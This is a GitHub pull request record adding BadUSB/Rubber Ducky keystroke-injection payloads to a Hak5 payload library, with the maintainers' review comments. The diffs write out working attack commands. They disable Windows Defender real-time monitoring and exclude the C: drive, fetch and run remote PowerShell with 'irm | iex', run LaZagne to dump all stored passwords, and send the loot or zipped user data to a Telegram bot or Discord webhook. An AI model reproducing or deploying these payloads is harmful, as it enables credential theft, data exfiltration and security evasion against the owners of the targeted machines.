### PR TITLE
1 New Mobile IOS payload | 2 New Exfiltration payloads

### PR DESCRIPTION
**Pull request by Mr-Proxy-source**
+ Added payload for opening links for IOS 17 and older
+ Added Lazagne exfil payload for exfiltrating all passwords through telegram bot
+ Added Google exfil payload that uses 7zip to zip user data, upload it to file-sharing service and send download link through telegram bot or discord webhook.
+ Fixed some mistakes in Copy and Waste

### CODE REVIEW

**Comment by Mr-Proxy-source** [comment]
Added Exfiltration using Lazagne application and sending results through telegram bot

**Comment by Mr-Proxy-source** [comment]
Added little fix for Copy and Waste payload

File: payloads/library/exfiltration/Google-Exfil/payload.txt [hunk 1]
```diff
@@ -0,0 +1,17 @@
...
+REM Version:	1.0
+REM Category:	Exfiltration
+REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
+
+DELAY 1500
+GUI r
+DELAY 500
+REM If you want to use Telegram change just bot token and chat id
+REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook
+STRING powershell -w h -NoP -Ep Bypass -Command $botToken='bot_token'; $chatID='chat_id'; $webhook='dc_webhook'; irm https://t.ly/pPFpN | iex
```
Comment (dallaswinger) [inline payloads/library/exfiltration/Google-Exfil/payload.txt:14]: https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads

File: payloads/library/exfiltration/Lazagne-Exfil/payload.txt [hunk 2]
```diff
@@ -0,0 +1,16 @@
...
+REM Description: Downloads lazagne, runs lazagne, stores all info to .txt file, sends file to telegram bot.
+REM Target:	Windows
+REM Version:	1.0
+REM Category:	Exfiltration
+REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'"
```
Comment (dallaswinger) [inline payloads/library/exfiltration/Lazagne-Exfil/payload.txt:13]: https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads

File: payloads/library/mobile/iOS/Open_Link/payload.txt [hunk 3]
```diff
@@ -0,0 +1,21 @@
...
+REM Version:	1.0
+REM Category:	Mobile-IOS
+REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
+
+DELAY 1500
+GUI h
+DELAY 1000
+GUI SPACE
+DELAY 250
+REM Put your link down there ↓
```
Comment (dallaswinger) [inline payloads/library/mobile/iOS/Open_Link/payload.txt:14]: use DEFINE
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#payload-configuration

File: payloads/library/exfiltration/Google-Exfil/payload.txt (hunk 1 above)
Comment (dallaswinger) [reply payloads/library/exfiltration/Google-Exfil/payload.txt:14]: also, use DEFINE
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#payload-configuration

File: payloads/library/exfiltration/Lazagne-Exfil/payload.txt (hunk 2 above)
Comment (dallaswinger) [reply payloads/library/exfiltration/Lazagne-Exfil/payload.txt:13]: also, use DEFINE
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#payload-configuration

File: payloads/library/mobile/iOS/Open_Link/payload.txt (hunk 3 above)
Comment (Mr-Proxy-source) [reply payloads/library/mobile/iOS/Open_Link/payload.txt]: Added defining for url.

**Comment by Mr-Proxy-source** [comment]
All requested changes have been made, if there is anything else let me know.
Happy new year btw :D

File: payloads/library/exfiltration/Lazagne-Exfil/payload.txt [hunk 4]
```diff
@@ -0,0 +1,24 @@
...
+DEFINE SCRIPT_URL example.com/payload.ps1?dl=1
+
+REM Here you will have to put your telegram bot details
+DEFINE BOT_TOKEN your-bot-token
+DEFINE CHAT_ID your-chat-id
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='BOT_TOKEN'; $ci='CHAT_ID'; irm SCRIPT_URL | iex'"
```
Comment (hak5peaks) [inline payloads/library/exfiltration/Lazagne-Exfil/payload.txt:21]: the only `DEFINE` being called is for `SCRIPT_URL`.  You need to add `#` to your defines. for example:

```
DEFINE #BOT_TOKEN your-bot-token
DEFINE #CHAT_ID your-chat-id
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1


STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='#BOT_TOKEN'; $ci='#CHAT_ID'; irm #SCRIPT_URL | iex'"
```
its not required you do it with `SCRIPT_URL`  its still highly recommended.

**Review by hak5peaks — CHANGES_REQUESTED** [review]

File: payloads/library/exfiltration/Lazagne-Exfil/payload.txt (hunk 4 above)
Comment (Mr-Proxy-source) [reply payloads/library/exfiltration/Lazagne-Exfil/payload.txt]: I did it my bad i forgot to add #

**Comment by Mr-Proxy-source** [comment]
Here i fixed it lmk if there is anything else.

**Review by hak5peaks — CHANGES_REQUESTED** [review]

File: payloads/library/exfiltration/Copy-And-Waste/payload.txt [hunk 5]
```diff
@@ -7,8 +7,8 @@ REM     Description: This payload is meant to exfiltrate whatever is copied to t
 REM     Target: Windows 10, 11
```
[the remark this answers is not in the document]
Comment (Mr-Proxy-source) [reply payloads/library/exfiltration/Copy-And-Waste/payload.txt:7]: i saw there is reports on discord server that there is a problem so i just wanted to help

[the remark this answers is not in the document]
Comment (Mr-Proxy-source) [reply payloads/library/exfiltration/Copy-And-Waste/payload.txt:7]: if its problem im going to remove these changes.

[the remark this answers is not in the document]
Comment (hak5peaks) [reply payloads/library/exfiltration/Copy-And-Waste/payload.txt:7]: I suggest removing the changes and opening a new PR requesting changes to that payload directly so the author can also review the changes.

File: payloads/library/exfiltration/Lazagne-Exfil/payload.ps1 [hunk 6]
```diff
@@ -0,0 +1,62 @@
+[Console]::OutputEncoding = [System.Text.Encoding]::UTF8
+
+# Download LaZagne and execute it
+$Test = "C:\temp"
+Start-BitsTransfer -Source "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -Destination "$Test/l.exe"
```
Comment (hak5peaks) [inline payloads/library/exfiltration/Lazagne-Exfil/payload.ps1:5]: Please remove and replace this with example.com and include instructions inside your readme on where to download and how to include it inside of your powershell script.

**Review by hak5peaks — CHANGES_REQUESTED** [review]

File: payloads/library/mobile/iOS/Open_Link/payload.txt [hunk 7]
```diff
@@ -0,0 +1,23 @@
+REM Title: Open Link
+REM Author:	mrproxy
+REM Description: Opens Spotlight, prints the link, enters it.
+REM Target:	Apple iOS (iPhone, iPad)
+REM Version:	1.0
+REM Category:	Mobile-IOS
+REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
+
+REM Put your link down there
+DEFINE TARGET_URL https://hak5.org
```
[the remark this answers is not in the document]
Comment (Mr-Proxy-source) [reply payloads/library/mobile/iOS/Open_Link/payload.txt]: Done.

File: payloads/library/exfiltration/Lazagne-Exfil/payload.ps1 (hunk 6 above)
Comment (Mr-Proxy-source) [reply payloads/library/exfiltration/Lazagne-Exfil/payload.ps1]: Done.

**Pull request merged**